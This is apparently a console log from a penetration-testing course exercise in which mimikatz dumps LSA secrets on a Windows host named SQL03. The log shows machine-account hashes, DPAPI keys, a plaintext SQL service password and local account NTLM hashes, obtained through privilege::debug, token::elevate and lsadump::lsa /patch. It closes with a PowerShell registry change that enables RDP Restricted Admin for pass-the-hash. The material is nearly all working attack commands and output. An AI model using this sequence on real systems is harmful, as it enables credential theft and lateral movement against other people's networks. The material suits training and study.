cur/hex : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
    NTLM:c52a092a8e12c89fda86819b12f06a06
    SHA1:204368033a4dcbfb1eb8c2cd3803bce84009c83a
old/hex : c8 a0 fb 2b 03 4e e7 05 4f 8c 77 72 aa 13 40 f1 13 05 40 ae 41 fd bf cf f8 7e 11 e6 91 ea 3c 2c fd 2a c7 cd 51 90 82 67 0c 10 55 c2 bc d0 6e c2 ca 56 32 53 a9 05 fe d2 15 07 30 37 a3 14 53 c7 4e 00 e5 69 3f c9 29 53 7a e8 00 91 ab 5f 9d 0f d9 02 c6 b4 2e 18 f7 83 88 df 26 e6 0b 96 03 09 28 0a 27 a8 84 be bd d1 4a e2 80 82 83 52 8c 3a b5 a1 f3 8f 27 36 a4 78 02 d4 82 ee 6c dc fa 57 4e af 41 1b 77 fd 90 3e c3 ff 56 0a 18 a4 f3 54 24 81 2d e9 32 04 aa 64 43 9f 52 78 92 71 88 71 2a 19 15 f0 a0 5a 61 2c 67 47 e9 68 e6 f9 62 bc 4c d4 28 e3 d3 ab ad e7 39 e6 6c ca bb 3c 47 da 45 d4 8b 7f 08 db ee aa 4c 3c 7b 86 2b 52 9d 34 24 ed 68 ec e5 25 b2 9c be 5b 7a 7e 6c 34 21 89 23 ab 53 21 f1 34 2d 86 a1 49 88 77 98 3b 90 23 
    NTLM:64ccfbf68a6704d22bb7ee1ee4bb6e3d
    SHA1:14af3cf89ff373ad9c5e64cdf35492b1e22a11d0

Secret  : DefaultPassword

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 51 e2 e0 e5 6e 4a 97 18 3d 56 27 39 4f 86 cf 5c 1b 2b a4 c3 69 3d 96 dc cd ee f6 49 59 2b e8 f2 44 85 2d b9 a4 1d 79 9e 
    full: 51e2e0e56e4a97183d5627394f86cf5c1b2ba4c3693d96dccdeef649592be8f244852db9a41d799e
    m/u : 51e2e0e56e4a97183d5627394f86cf5c1b2ba4c3 / 693d96dccdeef649592be8f244852db9a41d799e
old/hex : 01 00 00 00 ee 7e 43 bc 31 86 7d 26 06 75 b3 0d 89 94 ef 3e b3 56 42 9a 55 6d d1 ae f8 a0 e3 e8 7c 12 4d 01 59 6c 16 fd 34 19 00 a1 
    full: ee7e43bc31867d260675b30d8994ef3eb356429a556dd1aef8a0e3e87c124d01596c16fd341900a1
    m/u : ee7e43bc31867d260675b30d8994ef3eb356429a / 556dd1aef8a0e3e87c124d01596c16fd341900a1

Secret  : NL$KM
cur/hex : b8 82 e2 17 71 1e 75 5c 05 26 0f 43 f2 be 0d a3 9d cc e5 ae d4 b5 d5 be 6b fe 72 da 0d cc cb 10 26 70 af d3 b7 5e d8 ba bf 34 51 cc e5 0b 6a 9e e8 76 bb fe 8b be 60 38 7d fc 47 d1 ca 12 fe 35 
old/hex : b8 82 e2 17 71 1e 75 5c 05 26 0f 43 f2 be 0d a3 9d cc e5 ae d4 b5 d5 be 6b fe 72 da 0d cc cb 10 26 70 af d3 b7 5e d8 ba bf 34 51 cc e5 0b 6a 9e e8 76 bb fe 8b be 60 38 7d fc 47 d1 ca 12 fe 35 

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : [email protected]
cur/text: 89sdfDSFksolds34f

Secret  : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\\SQLTELEMETRY$SQLEXPRESS

mimikatz(commandline) # exit
Bye!

c:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <http://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <http://pingcastle.com> / <http://mysmartlogon.com>   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\\SYSTEM

496	{0;000003e7} 1 D 29104     	NT AUTHORITY\\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 3353968   	NT AUTHORITY\\SYSTEM	S-1-5-18	(04g,31p)	Primary
 * Thread Token  : {0;000003e7} 1 D 3380887   	NT AUTHORITY\\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # lsadump::lsa /patch
Domain : SQL03 / S-1-5-21-4076639736-4188291740-2971731876

RID  : 000001f4 (500)
User : Administrator
LM   : 
NTLM : **8388d07604009d14cbb78f7d37b9e887**

RID  : 000001f7 (503)
User : DefaultAccount
LM   : 
NTLM : 

RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 

RID  : 000003e9 (1001)
User : setup
LM   : 
NTLM : 1fd7eecf8c3c358597ffe32797ed01e9

RID  : 000001f8 (504)
User : WDAGUtilityAccount
LM   : 
NTLM : a19e10c7c74cfdbbe0b52b7db1c43025

mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>powershell -exec bypass
powershell -exec bypass
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\\Users\\Administrator\\Desktop> **New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force**
New-ItemProperty -Path "HKLM:\\System\\CurrentControlSet\\Control\\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

DisableRestrictedAdmin : 0
PSPath                 : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa
PSParentPath           : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control
PSChildName            : Lsa
PSDrive                : HKLM
PSProvider             : Microsoft.PowerShell.Core\\Registry

Reference: course material, p. 505